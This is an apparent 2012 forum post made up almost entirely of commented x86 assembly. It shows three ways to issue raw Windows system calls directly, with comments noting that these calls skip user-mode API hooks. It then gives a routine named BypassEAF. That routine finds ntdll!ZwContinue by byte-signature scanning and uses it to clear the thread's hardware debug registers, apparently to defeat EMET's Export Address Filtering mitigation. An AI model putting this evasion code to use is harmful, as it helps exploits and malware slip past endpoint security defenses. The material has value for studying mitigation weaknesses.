Indy
February 19th, 2012, 06:46
Code:
	; Variant 1 - sysenter issued through a two-level call stub.
	; Preconditions visible from the code: a CONTEXT already lies at [esp]
	; (its address is the first push, its size is dropped by the add below),
	; and eax = 0D5H is a build-specific service index; the text further
	; down asks how to obtain that index instead of hard-coding it.
	; The kernel reads the service's arguments at edx+2*4 (see the note on
	; Call Stub), so two return-address slots must sit between edx and the
	; pushed arguments; the Stub/Gate pair creates exactly those two slots.
	; Review note: a sysenter executed from outside ntdll never passes
	; through the user-mode Nt* stubs, so inline API hooks do not see it;
	; only kernel-side telemetry observes this call.
	push esp		; 2nd argument: pointer to the CONTEXT on the stack
	push NtCurrentThread	; -2 ; 1st argument: pseudo-handle for the current thread
	mov eax,0D5H		; service index (differs between Windows builds)
	Call Stub	; T-frame.rEdx + 2*4: Arg's, T-frame.rEsp: T-frame.rEdx, T-frame.rEip: @KiFastSystemCallRet(Ret).
	add esp,sizeof(CONTEXT)	; Stub's retn 2*4 already removed the two arguments; drop the CONTEXT too
	ret
Stub:
	Call Gate		; pushes the slot at [edx+0]: return into Stub
	retn 2*4		; reached via KiFastSystemCallRet's ret: back to the caller, popping the two arguments
Gate:
	mov edx,esp		; edx -> [ret->Stub][ret->caller][NtCurrentThread][saved esp]
	db 0Fh, 034h		; sysenter
Code:
	; Variant 2 - same call without the Stub level. The extra push eax
	; supplies the second return-address slot by hand, so the arguments
	; again start at edx+2*4; the filler value (the service index) is not
	; read as an argument, only its position matters.
	; Preconditions as in variant 1: CONTEXT at [esp], eax = 0D5H.
	push esp		; 2nd argument: pointer to the CONTEXT on the stack
	mov eax,0D5H		; service index (differs between Windows builds)
	push NtCurrentThread	; -2 ; 1st argument: pseudo-handle for the current thread
	push eax		; filler slot standing in for Stub's return address
	Call Gate		; pushes [edx+0]; KiFastSystemCallRet's ret brings execution back here
	add esp,sizeof(CONTEXT) + 2*4 + 4	; drop the CONTEXT, the two arguments and the filler
	ret
Gate:
	mov edx,esp		; edx -> [ret->caller][filler][NtCurrentThread][saved esp]
	db 0Fh, 034h		; sysenter
Code:
	; Variant 3 - int 2Eh instead of sysenter. On the interrupt path the
	; kernel takes the argument pointer from edx directly, so edx is set to
	; esp right after the pushes and no return-address slots are needed.
	; Same preconditions: CONTEXT at [esp], eax = 0D5H.
	; The snippet ends without a ret; presumably truncated by the author.
	push esp		; 2nd argument: pointer to the CONTEXT on the stack
	push NtCurrentThread	; -2 ; 1st argument: pseudo-handle for the current thread
	mov eax,0D5H		; service index (differs between Windows builds)
	mov edx,esp		; edx -> [NtCurrentThread][saved esp]
	Int 2EH			; legacy system-call entry; execution resumes on the next line
	add esp,2*4 + sizeof(CONTEXT)	; drop the two arguments and the CONTEXT
That's better. How do we get the service ID?
Code:
; GET_NT_BASE Reg32 - load the base address of ntdll.dll into Reg32.
; Walks TEB -> PEB -> Ldr -> InLoadOrderModuleList and takes the second
; entry's DllBase. Relies on the load-order convention that the first
; entry is the process image and the second is ntdll.dll (as the original
; comment assumes) - TODO confirm for the Windows versions in scope.
; Clobbers only Reg32; the movs leave flags untouched.
%GET_NT_BASE macro Reg32
	mov Reg32,fs:[TEB.Peb]					; fs: addresses the TEB; read its PEB pointer
	mov Reg32,PEB.Ldr[Reg32]				; PEB_LDR_DATA*
	mov Reg32,PEB_LDR_DATA.InLoadOrderModuleList.Flink[Reg32]	; 1st entry (InLoadOrderModuleList is assumed to be at offset 0 of the entry, so Flink doubles as the entry pointer)
	mov Reg32,LDR_DATA_TABLE_ENTRY.InLoadOrderModuleList.Flink[Reg32]	; 2nd entry
	mov Reg32,LDR_DATA_TABLE_ENTRY.DllBase[Reg32]	; ntdll.dll
endm
;-----------------------------------------------------------------------
; PVOID BypassEAF(void)
; Locates ntdll!ZwContinue by a byte signature in ntdll's code section
; (rather than through the export directory, which is what EMET's EAF
; guards - inferred from the procedure name, not stated on the page) and
; calls it with a CONTEXT whose only selected part is the debug-register
; set, all zero, so the thread's hardware breakpoints DR0-DR7 are cleared.
; Out:    eax = ntdll base on success, 0 if the signature was not found
; Clobb:  ecx, edx, flags (esi/edi saved and restored by 'uses')
; Stack:  300H-byte local CONTEXT buffer
; Assumes a 32-bit process: x86 CONTEXT layout and a 32-bit ntdll.
; Review note: exception dispatch normally reaches NtContinue with a
; CONTEXT carrying control/integer state; a call with
; CONTEXT_DEBUG_REGISTERS alone, all-zero DRs and a signature-resolved
; address is the observable anomaly in this routine.
;-----------------------------------------------------------------------
BypassEAF proc uses esi edi
Local Context[300H]:BYTE
	%GET_NT_BASE Eax	; eax = ntdll base
	mov edi,eax		; edi: scan cursor
	mov esi,eax		; esi: keep the base for the return value
	add eax,IMAGE_DOS_HEADER.e_lfanew[eax]	; eax -> IMAGE_NT_HEADERS
	add edi,IMAGE_NT_HEADERS.OptionalHeader.BaseOfCode[eax]	; edi -> start of the code section
	mov ecx,IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode[eax]	; ecx = bytes to scan
	mov ax,51H	; push ecx	; al = first signature byte for scasb (eax is dead from here on)
	sub ecx,20H		; keep the 20-byte compare window below inside the section
@@:
; 51 53 xx xx xx xx xx 0A C0 74 xx 5B 59 6A 00 51 E8 xx xx xx xx
	repne scasb		; advance edi one past the next 51H; ZF clear if ecx ran out
	jne Error		; no further candidate
	cmp byte ptr [edi],53H	; push ebx
	jne @b
	cmp word ptr [edi + 6],0C00AH	; or al,al	(bytes 0A C0, little-endian)
	jne @b
	cmp byte ptr [edi + 8],74H	; je
	jne @b
	cmp dword ptr [edi + 10],006A595BH	; pop ebx/pop ecx/push 0	(bytes 5B 59 6A 00)
	jne @b
	cmp word ptr [edi + 14],0E851H	; push ecx/call ZwContinue	(bytes 51 E8)
	jne @b
	mov edx,dword ptr [edi + 16]	; rel32 operand of the call (E8) at edi+15
	xor eax,eax
	lea edx,[edx + edi + 20]	; edx = rel32 + address of the instruction after the call = ZwContinue
	push eax		; 2nd argument: 0 (TestAlert = FALSE)
	lea edi,Context
	mov ecx,8
	push edi		; 1st argument: &Context
	rep stosd		; zero the first 8 dwords: ContextFlags plus the debug-register fields of the x86 CONTEXT; the rest of the local stays uninitialised
	mov dword ptr [Context],CONTEXT_DEBUG_REGISTERS	; ContextFlags: only the debug registers are applied
	Call Edx	; ZwContinue()	; callee pops the two arguments (stdcall); the code below expects a normal return
	mov eax,esi		; success: ntdll base
Exit:
	ret			; MASM expands this into the 'uses'/Local epilogue
Error:
	xor eax,eax		; signature not found
	jmp Exit
BypassEAF endp